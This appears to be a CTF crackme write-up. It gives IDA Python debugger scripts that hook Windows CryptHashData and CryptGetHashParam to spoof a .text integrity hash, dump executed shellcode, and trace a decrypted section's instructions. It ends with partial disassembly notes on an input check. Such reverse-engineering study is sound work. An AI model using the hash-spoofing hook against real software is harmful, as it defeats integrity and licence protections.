    """Add (and enable) a breakpoint at ``ea``.

    Tries the ``idc`` calls first and ``ida_dbg.add_bpt`` second. Returns
    True as soon as one path completes without raising, False when both
    raise. The APIs' own return values are not inspected.
    """
    try:
        idc.add_bpt(ea)
        idc.enable_bpt(ea, True)
    except Exception:
        try:
            ida_dbg.add_bpt(ea)
        except Exception:
            return False
    return True

class Hooks(ida_dbg.DBG_Hooks):
    """Breakpoint hooks that track hashes of .text and overwrite the retrieved hash value.

    ``crypt_hashdata_ea`` and ``crypt_gethashparam_ret_ea`` are assigned by
    ``start()`` after construction.
    """

    def dbg_bpt(self, tid, ea):
        """Dispatch a breakpoint hit to the matching handler; always returns 0."""
        esp = ida_dbg.get_reg_val("ESP")
        if ea == self.crypt_hashdata_ea:
            return self._on_hash_data(tid, esp)
        if ea == self.crypt_gethashparam_ret_ea:
            return self._on_get_hash_param_ret(tid, esp)
        return 0

    def _on_hash_data(self, tid, esp):
        """Remember the hash handle when the hashed buffer lies inside .text, then resume."""
        # Dwords at ESP+4, +8, +0xC are read as hHash, pbData, cbData.
        hHash, pbData, cbData = (dbg_read_u32(esp + off) for off in (4, 8, 0xC))
        if is_in_text(pbData, cbData):
            g_hash_seen_text.add(hHash)
            print(f"[hash] tid={tid} hHash=0x{hHash:08X} HASHED_TEXT pb=0x{pbData:08X} len=0x{cbData:X}")
        ida_dbg.continue_process()
        return 0

    def _on_get_hash_param_ret(self, tid, esp):
        """Overwrite the hash output with PATCH_BYTES for tracked handles, then resume."""
        # Dwords at ESP+4 .. ESP+0x10 are read as hHash, dwParam, pbOut, pdwLen.
        hHash, dwParam, pbOut, pdwLen = (dbg_read_u32(esp + off) for off in (4, 8, 0xC, 0x10))
        if dwParam == 2 and hHash in g_hash_seen_text and pbOut == PATCH_DST:
            ok1 = dbg_write_mem(PATCH_DST, PATCH_BYTES)
            ok2 = dbg_write_u32(pdwLen, 0x20) if pdwLen else True
            print(f"[patch] tid={tid} hHash=0x{hHash:08X} patched @0x{PATCH_DST:08X} bytes_ok={ok1} len_ok={ok2} (dwParam=HP_HASHVAL)")
        ida_dbg.continue_process()
        return 0

def start():
    """Resolve both breakpoint addresses, arm them and install ``Hooks``.

    Prints a message and returns without installing hooks when
    CryptHashData cannot be resolved or a breakpoint cannot be added.
    """
    global g_hooks
    if g_hooks is not None:
        print("[patchhash] already started")
        return

    # Prefer the live module base; otherwise use the recorded absolute address.
    cryptsp_base = find_module_base("cryptsp")
    crypt_gethashparam_ret = (cryptsp_base + 0x50D2) if cryptsp_base else CRYPTSP_GHP_RET_EA_ABS

    crypt_hashdata_ea = resolve_ea_by_names(CRYPT_HASHDATA_NAME_CANDIDATES)
    if crypt_hashdata_ea is None:
        print("[patchhash] WARNING: cannot resolve cryptsp_CryptHashData by name.")
        print("[patchhash] Please rename it or set its EA manually in the script.")
        return

    if not add_bpt(crypt_hashdata_ea):
        print(f"[patchhash] failed to add bpt @ 0x{crypt_hashdata_ea:08X} (CryptHashData)")
        return
    if not add_bpt(crypt_gethashparam_ret):
        print(f"[patchhash] failed to add bpt @ 0x{crypt_gethashparam_ret:08X} (GetHashParam RET)")
        return

    g_hooks = Hooks()
    g_hooks.crypt_hashdata_ea = crypt_hashdata_ea
    g_hooks.crypt_gethashparam_ret_ea = crypt_gethashparam_ret
    g_hooks.hook()

    summary = (
        "[patchhash] started.",
        f" CryptHashData EA = 0x{crypt_hashdata_ea:08X}",
        f" GetHashParam RET EA = 0x{crypt_gethashparam_ret:08X}",
        f" TEXT region = 0x{TEXT_BASE:08X} .. 0x{(TEXT_BASE+TEXT_LEN):08X}",
        f" PATCH dst = 0x{PATCH_DST:08X}",
        f" PATCH bytes len = {len(PATCH_BYTES)}",
    )
    for entry in summary:
        print(entry)
def stop():
    """Unhook the installed hooks (if any) and report that the script stopped."""
    global g_hooks
    installed = g_hooks
    if installed:
        try:
            installed.unhook()
        except Exception:
            pass
        g_hooks = None
    print("[patchhash] stopped.")

start()

Mix:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
import os
import struct
import idc
import ida_dbg
import ida_kernwin
import idaapi

BREAK_EA = 0x00404010
OUTPUT_PATH = r"E:\CTF\temp\dump.bin"
READ_SIZE = 0x10
PAD_SIZE = 0x10
APPEND_OUTPUT = False
DEDUP_CONSECUTIVE = True
MAX_DUMPS = 0
TEXT_BASE = 0x00401000
TEXT_LEN = 0x8A00
PATCH_DST = 0x0040D268
CRYPTSP_GHP_RET_EA_ABS = 0x720D50D2
CRYPT_HASHDATA_NAME_CANDIDATES = ["cryptsp_CryptHashData", "cryptsp.dll_CryptHashData", "CryptHashData"]
HP_HASHVAL = 2
PATCH_BYTES = bytes.fromhex("F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2")
g_hooks = None
g_fp = None
g_hash_seen_text = set()
g_last_dump16 = None
g_dump_count = 0

def _execute_sync(fn):
try: ida_kernwin.execute_sync(fn, ida_kernwin.MFF_FAST)
except Exception:
try: fn()
except Exception: pass

def _continue():
try:
ida_dbg.continue_process()
return
except Exception as e: print(f"[mix] continue failed: {e}")

def dbg_read_mem(ea, size):
    """Read ``size`` bytes of debuggee memory at ``ea``; ``None`` on an empty result or any error."""
    try:
        raw = idaapi.dbg_read_memory(ea, size)
    except Exception:
        return None
    if not raw:
        return None
    try:
        return bytes(raw)
    except Exception:
        return None

def dbg_write_mem(ea, data: bytes):
    """Write ``data`` to debuggee memory at ``ea``; returns success as a bool (False on any error)."""
    try:
        status = idaapi.dbg_write_memory(ea, data)
    except Exception:
        return False
    return bool(status)

def dbg_read_u32(ea):
    """Read a little-endian unsigned dword at ``ea``; ``None`` when fewer than 4 bytes come back."""
    raw = dbg_read_mem(ea, 4)
    if raw and len(raw) == 4:
        return int.from_bytes(raw, "little")
    return None

def dbg_write_u32(ea, v):
    """Write the low 32 bits of ``v`` at ``ea`` as a little-endian dword; returns the write status."""
    packed = struct.pack("<I", v & 0xFFFFFFFF)
    return dbg_write_mem(ea, packed)

def is_in_text(pb, cb):
    """True when the ``cb``-byte range starting at ``pb`` lies within ``TEXT_BASE .. TEXT_BASE + TEXT_LEN``.

    ``None`` for either argument yields False.
    """
    if pb is None or cb is None:
        return False
    if pb < TEXT_BASE:
        return False
    return pb + cb <= TEXT_BASE + TEXT_LEN

def find_module_base(substr: str):
    """Return the base address of the first loaded module whose name contains ``substr``.

    The match is case-insensitive. Returns ``None`` when nothing matches or
    the module list cannot be enumerated.

    Enumeration uses the ``modinfo_t``-based form of
    ``ida_dbg.get_first_module`` / ``get_next_module``. The argument-less
    call form the script used originally is kept as a fallback; where the
    API requires a ``modinfo_t`` that form raised and the lookup always
    returned ``None``.
    """
    needle = substr.lower()

    # Preferred form: the API fills a caller-supplied modinfo_t and returns a bool.
    try:
        import ida_idd
        info = ida_idd.modinfo_t()
        more = ida_dbg.get_first_module(info)
        while more:
            name = (getattr(info, "name", "") or "").lower()
            if needle in name:
                return int(getattr(info, "base", 0))
            more = ida_dbg.get_next_module(info)
        return None
    except Exception:
        pass

    # Fallback: the original call form (returns a module object).
    try:
        m = ida_dbg.get_first_module()
        while m:
            name = (getattr(m, "name", "") or "").lower()
            if needle in name:
                return int(getattr(m, "base", 0))
            m = ida_dbg.get_next_module(m)
    except Exception:
        pass
    return None

def resolve_ea_by_names(names):
    """Look the names up in order and return the first usable address, or ``None``.

    Addresses equal to ``idc.BADADDR`` or 0 are treated as unresolved.
    """
    for label in names:
        resolved = idc.get_name_ea_simple(label)
        if resolved == idc.BADADDR or resolved == 0:
            continue
        return resolved
    return None

def add_bpt(ea):
    """Add and enable a breakpoint at ``ea`` via ``idc``, else via ``ida_dbg``.

    Returns True once one path finishes without raising and False when
    both raise. The underlying return values are not checked.
    """
    try:
        idc.add_bpt(ea)
        idc.enable_bpt(ea, True)
    except Exception:
        try:
            ida_dbg.add_bpt(ea)
        except Exception:
            return False
    return True

def _dump_once(tid=None):
    """Append one record (READ_SIZE bytes at EBX plus PAD_SIZE zero bytes) to ``g_fp``.

    Skipped when MAX_DUMPS has been reached, when EBX is unusable, when
    the read fails, or (with DEDUP_CONSECUTIVE) when the bytes equal the
    previously written record. ``tid`` is accepted but not used.
    """
    global g_fp, g_last_dump16, g_dump_count
    if MAX_DUMPS and g_dump_count >= MAX_DUMPS:
        return

    try:
        ebx = ida_dbg.get_reg_val("EBX")
    except Exception as e:
        print(f"[dump] get_reg_val(EBX) failed: {e}")
        return
    if ebx is None or ebx < 0x10000:
        return

    chunk = dbg_read_mem(ebx, READ_SIZE)
    if chunk is None:
        print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{ebx:08X}")
        return

    # Zero-fill a short read so every record has the same size.
    shortfall = READ_SIZE - len(chunk)
    if shortfall > 0:
        chunk += b"\x00" * shortfall

    if DEDUP_CONSECUTIVE and g_last_dump16 == chunk:
        return

    record = chunk + (b"\x00" * PAD_SIZE)
    try:
        g_fp.write(record)
        g_fp.flush()
        g_last_dump16 = chunk
        g_dump_count += 1
        print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{ebx:08X} | wrote {len(record)} bytes")
    except Exception as e:
        print(f"[dump] file write error: {e}")

def _maybe_patch_hash():
    """Overwrite the hash output with PATCH_BYTES when this call retrieves a tracked .text hash.

    Reads the dwords at ESP+4 .. ESP+0x10 as hHash, dwParam, pbOut and
    pdwLen. Patches only when dwParam is HP_HASHVAL, hHash was recorded in
    ``g_hash_seen_text`` and pbOut equals PATCH_DST.
    """
    esp = ida_dbg.get_reg_val("ESP")
    hHash, dwParam, pbOut, pdwLen = (dbg_read_u32(esp + off) for off in (4, 8, 0xC, 0x10))

    if dwParam != HP_HASHVAL:
        return
    if hHash not in g_hash_seen_text or pbOut != PATCH_DST:
        return

    ok1 = dbg_write_mem(PATCH_DST, PATCH_BYTES)
    # Also store 0x20 as the reported length when a length pointer was passed.
    ok2 = dbg_write_u32(pdwLen, 0x20) if pdwLen else True
    print(f"[patch] hHash=0x{hHash:08X} patched @0x{PATCH_DST:08X} bytes_ok={ok1} len_ok={ok2}")

class MixHooks(ida_dbg.DBG_Hooks):
    """Combined hooks: track hashes of .text, patch the retrieved hash, and dump at BREAK_EA."""

    def __init__(self, crypt_hashdata_ea, crypt_gethashparam_ret_ea):
        super().__init__()
        self.crypt_hashdata_ea = crypt_hashdata_ea
        self.crypt_gethashparam_ret_ea = crypt_gethashparam_ret_ea

    def _record_text_hash(self, tid):
        """Remember the hash handle when the hashed buffer lies inside .text."""
        esp = ida_dbg.get_reg_val("ESP")
        # Dwords at ESP+4, +8, +0xC are read as hHash, pbData, cbData.
        hHash, pbData, cbData = (dbg_read_u32(esp + off) for off in (4, 8, 0xC))
        if is_in_text(pbData, cbData):
            g_hash_seen_text.add(hHash)
            print(f"[hash] tid={tid} hHash=0x{hHash:08X} HASHED_TEXT pb=0x{pbData:08X} len=0x{cbData:X}")

    def dbg_bpt(self, tid, ea):
        """Handle a hit on one of the three breakpoints and resume; always returns 0.

        The process is not resumed when the dump limit is reached
        (``stop()`` is called instead) or when ``ea`` is not one of ours.
        """
        try:
            if ea == self.crypt_hashdata_ea:
                self._record_text_hash(tid)
            elif ea == self.crypt_gethashparam_ret_ea:
                _maybe_patch_hash()
            elif ea == BREAK_EA:
                _dump_once(tid=tid)
                if MAX_DUMPS and g_dump_count >= MAX_DUMPS:
                    print(f"[dump] reached MAX_DUMPS={MAX_DUMPS}, stopping hooks.")
                    stop()
                    return 0
            else:
                return 0
            _execute_sync(_continue)
        except Exception as e:
            print(f"[mix] dbg_bpt exception: {e}")
            # Still try to resume so the debuggee is not left suspended.
            try:
                _execute_sync(_continue)
            except Exception:
                pass
        return 0

    def dbg_process_exit(self, pid, tid, ea, exit_code):
        """Report the exit code and call ``stop()``, ignoring any error from it."""
        print(f"[mix] process exit (code={exit_code}), stopping.")
        try:
            stop()
        except Exception:
            pass
        return 0

def start():
    """Resolve addresses, arm the three breakpoints, open the dump file and install MixHooks.

    All steps that can fail with an early ``return`` (name resolution and
    breakpoint creation) run before the output file is opened. A failed
    start therefore neither truncates an existing dump nor leaves a file
    handle open behind ``g_fp``.
    """
    global g_hooks, g_fp, g_hash_seen_text, g_last_dump16, g_dump_count
    if g_hooks is not None:
        print("[mix] already started")
        return

    crypt_hashdata_ea = resolve_ea_by_names(CRYPT_HASHDATA_NAME_CANDIDATES)
    if crypt_hashdata_ea is None:
        print("[mix] ERROR: cannot resolve cryptsp_CryptHashData by name.")
        print("[mix] Please rename that function in IDA or hardcode its EA in the script.")
        return

    # Prefer the live module base; otherwise use the recorded absolute address.
    cryptsp_base = find_module_base("cryptsp")
    if cryptsp_base:
        crypt_gethashparam_ret_ea = cryptsp_base + 0x50D2
    else:
        crypt_gethashparam_ret_ea = CRYPTSP_GHP_RET_EA_ABS

    wanted = (
        (BREAK_EA, ""),
        (crypt_hashdata_ea, " (CryptHashData)"),
        (crypt_gethashparam_ret_ea, " (GetHashParam RET)"),
    )
    for bpt_ea, suffix in wanted:
        if not add_bpt(bpt_ea):
            print(f"[mix] ERROR: add_bpt failed @ 0x{bpt_ea:08X}{suffix}")
            return

    # Fresh per-run state.
    g_hash_seen_text = set()
    g_last_dump16 = None
    g_dump_count = 0

    os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)
    # Close a handle left behind by an earlier start that did not finish.
    if g_fp is not None:
        try:
            g_fp.close()
        except Exception:
            pass
        g_fp = None
    g_fp = open(OUTPUT_PATH, "ab" if APPEND_OUTPUT else "wb")

    g_hooks = MixHooks(crypt_hashdata_ea, crypt_gethashparam_ret_ea)
    g_hooks.hook()
    print("[mix] started.")
    print(f" BREAK_EA = 0x{BREAK_EA:08X}")
    print(f" CryptHashData EA = 0x{crypt_hashdata_ea:08X}")
    print(f" GetHashParam RET EA = 0x{crypt_gethashparam_ret_ea:08X}")
    print(f" TEXT = 0x{TEXT_BASE:08X}..0x{(TEXT_BASE+TEXT_LEN):08X}")
    print(f" PATCH_DST = 0x{PATCH_DST:08X}")
    print(f" OUTPUT = {OUTPUT_PATH}")
    print(f" DEDUP_CONSECUTIVE = {DEDUP_CONSECUTIVE}")
    print(f" MAX_DUMPS = {MAX_DUMPS or 'unlimited'}")

def stop():
    """Remove the hooks, disable every breakpoint ``start()`` armed, and close the dump file.

    Besides BREAK_EA, the CryptHashData and GetHashParam-return
    breakpoints recorded on the hook object are disabled too. Otherwise
    they would keep suspending the process after the hooks that resume it
    are gone. Every step is best effort.
    """
    global g_hooks, g_fp

    to_disable = [BREAK_EA]
    if g_hooks is not None:
        # Collect the extra addresses before the hook object is dropped.
        for attr in ("crypt_hashdata_ea", "crypt_gethashparam_ret_ea"):
            extra_ea = getattr(g_hooks, attr, None)
            if extra_ea is not None and extra_ea not in to_disable:
                to_disable.append(extra_ea)
        try:
            g_hooks.unhook()
        except Exception:
            pass
        g_hooks = None

    for bpt_ea in to_disable:
        try:
            idc.enable_bpt(bpt_ea, False)
        except Exception:
            pass

    if g_fp is not None:
        try:
            g_fp.flush()
            g_fp.close()
        except Exception:
            pass
        g_fp = None
    print("[mix] stopped.")

if __name__ == "__main__":
start()

Set a hardware breakpoint at 0x19F38C: the shellcode first calls strlen and compares the length with 19. However, setting hardware breakpoints can also cause subsequent instructions to malfunction after the breakpoint triggers. Parse dump.bin (note that if the instruction is a call, it will not appear as the first line of a block):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*-
import os
import ida_segment
import ida_bytes
import ida_ua
import idc
import idaapi

RECORD_SIZE = 0x20
VALID_PREFIX = 0x10
OUT_ASMCODE = r"E:\CTF\temp\asmcode.txt"

def to_pat_hex(bs: bytes) -> str:
    """Return ``bs`` as a lowercase hex string with no separators."""
    hex_text = bs.hex()
    return hex_text

def main():
    """Extract the executed instruction bytes from every record of the segment at address 0.

    The segment is walked in RECORD_SIZE steps. For each record the first
    instruction (decoded within the first VALID_PREFIX bytes) is written to
    OUT_ASMCODE as hex; if the instruction right after it is a ``call``,
    that one is written too. Records that do not decode are skipped.

    Prints an error and returns when no segment contains address 0
    (previously this raised AttributeError on ``None``).
    """
    seg = ida_segment.getseg(0)
    if seg is None:
        print("[err] no segment contains address 0, nothing to parse")
        return

    start, end = seg.start_ea, seg.end_ea
    nrec = (end - start) // RECORD_SIZE
    os.makedirs(os.path.dirname(OUT_ASMCODE), exist_ok=True)

    out_lines = []
    for i in range(nrec):
        ea = start + i * RECORD_SIZE
        ida_bytes.del_items(ea, ida_bytes.DELIT_SIMPLE, VALID_PREFIX)

        insn1 = ida_ua.insn_t()
        ilen1 = ida_ua.decode_insn(insn1, ea)
        if ilen1 <= 0 or ilen1 > VALID_PREFIX:
            continue
        bytes1 = ida_bytes.get_bytes(ea, ilen1)
        if not bytes1:
            continue
        out_lines.append(to_pat_hex(bytes1))

        # A call never shows up as the first instruction of a record, so
        # also pick up a call that directly follows the first instruction.
        ea2 = ea + ilen1
        if ea2 < ea + VALID_PREFIX:
            insn2 = ida_ua.insn_t()
            ilen2 = ida_ua.decode_insn(insn2, ea2)
            if ilen2 > 0 and insn2.itype == idaapi.NN_call:
                bytes2 = ida_bytes.get_bytes(ea2, ilen2)
                if bytes2:
                    out_lines.append(to_pat_hex(bytes2))

    with open(OUT_ASMCODE, "w", encoding="utf-8") as f:
        for s in out_lines:
            f.write(s + "\n")
    print(f"[ok] wrote {len(out_lines)} lines -> {OUT_ASMCODE}")

if __name__ == "__main__":
main()

Then patch the decrypted .pc section into another copy of Crackme.exe and get the disassembly:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
import os
import idc
import ida_bytes
import ida_segment
import ida_ua

ASMCODE_PATH = r"E:\CTF\temp\asmcode.txt"
OUT_TRACEASM = r"E:\CTF\temp\traceasm.txt"
PC_START_EA = 0x0040A000
WINDOW = 0x20

def hex_to_bytes(hx: str) -> bytes:
    """Decode a hex string (surrounding whitespace and case ignored) to bytes.

    Raises:
        ValueError: when the cleaned string has an odd number of characters.
    """
    cleaned = hx.strip().lower()
    if len(cleaned) & 1:
        raise ValueError(f"bad hex len: {cleaned}")
    return bytes.fromhex(cleaned)

def bytes_to_patstr(bs: bytes) -> str:
    """Format ``bs`` as space-separated two-digit lowercase hex bytes."""
    pieces = [format(value, "02x") for value in bs]
    return " ".join(pieces)

def get_pc_seg():
    """Return the segment named ``.pc`` or ``pc``, else the segment containing PC_START_EA."""
    # Generator keeps the second lookup lazy: "pc" is only tried if ".pc" is missing.
    by_name = (ida_segment.get_segm_by_name(label) for label in (".pc", "pc"))
    found = next((seg for seg in by_name if seg), None)
    if found:
        return found
    return ida_segment.getseg(PC_START_EA)

def read_bytes(ea: int, n: int) -> bytes | None:
    """Return ``n`` database bytes at ``ea``, or ``None`` when nothing (or an empty result) is returned."""
    data = ida_bytes.get_bytes(ea, n)
    return data or None

pc_blob = 0
seg_start = 0
seg_end = 0

def find_in_range(start_ea: int, end_ea: int, needle: bytes) -> int:
    """Search the cached segment bytes for ``needle`` within ``[start_ea, end_ea)``.

    The range is clipped to the cached segment. Returns the address of the
    first match that fits entirely inside the clipped range, or
    ``idc.BADADDR`` when there is no cache, the range is empty or nothing
    matches.
    """
    global pc_blob, seg_start, seg_end
    if not pc_blob:
        return idc.BADADDR

    # Convert the clipped addresses to offsets into pc_blob.
    lo = max(0, max(start_ea, seg_start) - seg_start)
    hi = min(end_ea, seg_end) - seg_start
    if hi < lo:
        return idc.BADADDR

    hit = pc_blob.find(needle, lo, hi)
    if hit == -1:
        return idc.BADADDR
    return seg_start + hit


def decode_len_and_mnem(ea: int, fallback_len: int):
    """Create and decode the instruction at ``ea``.

    Returns ``(length, mnemonic)``: the length is ``fallback_len`` when
    decoding reports a non-positive size, and the mnemonic is lowercased
    (empty string when none is available).
    """
    idc.create_insn(ea)
    decoded = ida_ua.insn_t()
    size = ida_ua.decode_insn(decoded, ea)
    mnemonic = idc.print_insn_mnem(ea) or ""
    length = size if size > 0 else fallback_len
    return length, mnemonic.lower()

def op_target(ea: int) -> int:
    """Return the value of operand 0 of the instruction at ``ea``; 0 when it is not an int or the lookup fails."""
    try:
        value = idc.get_operand_value(ea, 0)
    except Exception:
        return 0
    if isinstance(value, int):
        return value
    return 0

def is_ret(mnem: str) -> bool:
    """True for any mnemonic beginning with ``ret``."""
    return mnem[:3] == "ret"


def is_call(mnem: str) -> bool:
    """True for ``call`` and ``callf``."""
    return mnem in ("call", "callf")


def is_jmp(mnem: str) -> bool:
    """True for the unconditional jumps ``jmp`` and ``jmpf``."""
    return mnem in ("jmp", "jmpf")


def is_cond_jump_or_loop(mnem: str) -> bool:
    """True for loop-type instructions and every ``j*`` mnemonic except the unconditional jumps."""
    loop_like = ("jcxz", "jecxz", "loop", "loope", "loopz", "loopne", "loopnz")
    if mnem in loop_like:
        return True
    return mnem[:1] == "j" and not is_jmp(mnem)

def main():
    """Replay the executed-instruction byte patterns against the .pc segment and write an address-annotated trace.

    For every hex pattern in ASMCODE_PATH the instruction is located in
    this order:

    1. at the expected ``cursor`` or within WINDOW bytes after it;
    2. likewise at ``alt_cursor`` (the taken target of the previous
       conditional jump or loop);
    3. at the address where the same pattern was matched last time;
    4. anywhere from PC_START_EA to the end of the segment.

    A matched instruction is written to OUT_TRACEASM as
    ``index<TAB>address<TAB>hex<TAB>disassembly``, and the cursor then
    follows calls, returns and jumps that stay inside the segment.

    A pattern that cannot be found anywhere is written as a ``<no match>``
    line and skipped. The previous behaviour restarted the replay from the
    first pattern with identical initial state, which fails again at the
    same record and only re-appends the same output until the restart
    limit is hit.

    Raises:
        RuntimeError: when no .pc segment can be found, or PC_START_EA lies
            outside it.
    """
    global pc_blob, seg_start, seg_end

    seg = get_pc_seg()
    if seg is None:
        raise RuntimeError(f"no .pc segment found and PC_START_EA=0x{PC_START_EA:08X} is not inside any segment")
    seg_start, seg_end = seg.start_ea, seg.end_ea
    if not (seg_start <= PC_START_EA < seg_end):
        raise RuntimeError(f"PC_START_EA=0x{PC_START_EA:08X} not in 0x{seg_start:08X}-0x{seg_end:08X}")
    pc_blob = ida_bytes.get_bytes(seg_start, seg_end - seg_start) or b""

    with open(ASMCODE_PATH, "r", encoding="utf-8") as f:
        codes_hex = [s for s in (line.strip() for line in f) if s]
    os.makedirs(os.path.dirname(OUT_TRACEASM), exist_ok=True)

    def locate(pos: int, needle: bytes) -> int:
        """Match ``needle`` exactly at ``pos`` or within WINDOW bytes after it."""
        if read_bytes(pos, len(needle)) == needle:
            return pos
        return find_in_range(pos, min(pos + WINDOW, seg_end), needle)

    cursor = PC_START_EA
    alt_cursor = None
    call_stack = []
    last_occ = {}
    missed = 0

    with open(OUT_TRACEASM, "w", encoding="utf-8") as out:
        for i, hx in enumerate(codes_hex):
            bs = hex_to_bytes(hx)

            ea = locate(cursor, bs)
            if ea == idc.BADADDR and alt_cursor is not None:
                # The previous conditional jump may have been taken.
                ea = locate(alt_cursor, bs)
            if ea == idc.BADADDR:
                if hx in last_occ:
                    ea = last_occ[hx]
                else:
                    ea = find_in_range(PC_START_EA, seg_end, bs)
            if ea == idc.BADADDR:
                # Not present in the segment at all: note it and move on,
                # leaving the cursors where they are.
                out.write(f"{i:06d}\t<no match>\t{hx}\t\n")
                missed += 1
                continue

            last_occ[hx] = ea
            ida_bytes.del_items(ea, ida_bytes.DELIT_SIMPLE, 16)
            idc.create_insn(ea)
            dis = idc.generate_disasm_line(ea, 0) or ""
            ilen, mnem = decode_len_and_mnem(ea, len(bs))
            out.write(f"{i:06d}\t0x{ea:08X}\t{hx}\t{dis}\n")

            next_fall = ea + ilen
            alt_cursor = None
            if is_call(mnem):
                tgt = op_target(ea)
                call_stack.append(next_fall)
                cursor = tgt if seg_start <= tgt < seg_end else next_fall
            elif is_ret(mnem):
                cursor = call_stack.pop() if call_stack else next_fall
            elif is_jmp(mnem):
                tgt = op_target(ea)
                cursor = tgt if seg_start <= tgt < seg_end else next_fall
            elif is_cond_jump_or_loop(mnem):
                tgt = op_target(ea)
                cursor = next_fall
                if seg_start <= tgt < seg_end:
                    alt_cursor = tgt
            else:
                cursor = next_fall

    print(f"[ok] wrote -> {OUT_TRACEASM}")
    print(f"[info] pc_seg=0x{seg_start:08X}-0x{seg_end:08X}, start=0x{PC_START_EA:08X}")
    if missed:
        print(f"[warn] {missed} pattern(s) were not found in the segment")

if __name__ == "__main__":
main()

From the assembly code, the shellcode uses [ebp-0x10] to [ebp-0x4] as temporary registers; add them to the dump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
def _dump_once(tid=None):
    """Append one dump record and print the four stack dwords at 0x19F354..0x19F360.

    Same record format and skip rules as the plain mix-script version. In
    addition, the four dwords labelled [EBP-0x10 ~ EBP-0x4] are read with
    ``dbg_read_u32`` (the mix script's own dword reader) and printed.

    The stack reads happen after the file write and outside its ``try``,
    so a failed read is no longer reported as a file write error. An
    unreadable dword is shown as ``0x????????``.

    NOTE(review): 0x19F354 is a hard-coded stack address; it presumably
    only holds for the debugging session it was observed in, so confirm it
    before reuse.
    """
    global g_fp, g_last_dump16, g_dump_count
    if MAX_DUMPS and g_dump_count >= MAX_DUMPS:
        return
    try:
        p = ida_dbg.get_reg_val("EBX")
    except Exception as e:
        print(f"[dump] get_reg_val(EBX) failed: {e}")
        return
    if p is None or p < 0x10000:
        return
    data = dbg_read_mem(p, READ_SIZE)
    if data is None:
        print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
        return
    if len(data) < READ_SIZE:
        data += b"\x00" * (READ_SIZE - len(data))
    if DEDUP_CONSECUTIVE and g_last_dump16 == data:
        return

    out = data + (b"\x00" * PAD_SIZE)
    try:
        g_fp.write(out)
        g_fp.flush()
    except Exception as e:
        print(f"[dump] file write error: {e}")
        return
    g_last_dump16 = data
    g_dump_count += 1

    def _hex(v):
        return "0x????????" if v is None else f"0x{v:08X}"

    ebp_arr = [dbg_read_u32(0x19F354 + 4 * i) for i in range(4)]
    print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | [EBP-0x10~EBP-0x4] = " + " ".join(_hex(v) for v in ebp_arr))

From the trace output, the 4 dwords are: sum_diff, block_state, byte_processed and state_tag. The block_state is initialized to 0xCAFEBABE and updated for every input byte. Whenever the number of processed bytes reaches a multiple of 4 (or 19, for the last block), block_state is XORed with the dword selected by the block index from the 5 dwords loaded at 40A000, and the result is ORed into sum_diff. A hardware breakpoint shows that the input is loaded by movzx eax, byte ptr [ecx+eax], and that this instruction executes exactly 19 times. Inside the loop, [ebp+8] is the block_state and [ebp-4] is the input byte. Analyze the first part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
0x0040A0AA      movzx eax, byte ptr [ecx+eax] ; inp[0]
0x0040A0AE push eax
0x0040A0AF push dword ptr [ebp-0Ch]
0x0040A0B2 mov ecx, [ebp-14h]
0x0040A0B5 call 0x40A1CE
0x0040A1CE push ebp
0x0040A1CF mov ebp, esp
0x0040A1D1 sub esp, 14h
0x0040A1D4 push ebx
0x0040A1D5 push esi
0x0040A1D6 push edi
0x0040A1D7 mov [ebp-14h], ecx
0x0040A1DA movzx eax, byte ptr [ebp+0Ch]
0x0040A1DE mov [ebp-4], eax
; jmp 0x0040A1E9
0x0040A1E9 mov eax, [ebp+8]
0x0040A1EC and eax, 1 ; and block_state, 1
; if block_state & 1 == 0 {
0x0040A1F5 cmp dword ptr [ebp-4], 40h ; num|let
; if inp < 0x40 (num) {{
0x0040A1FB xor eax, eax
0x0040A1FD cmp eax, 6Ch ; 'l'
0x0040A203 mov eax, [ebp-4]
0x0040A206 and eax, 2 ; and inp, 2
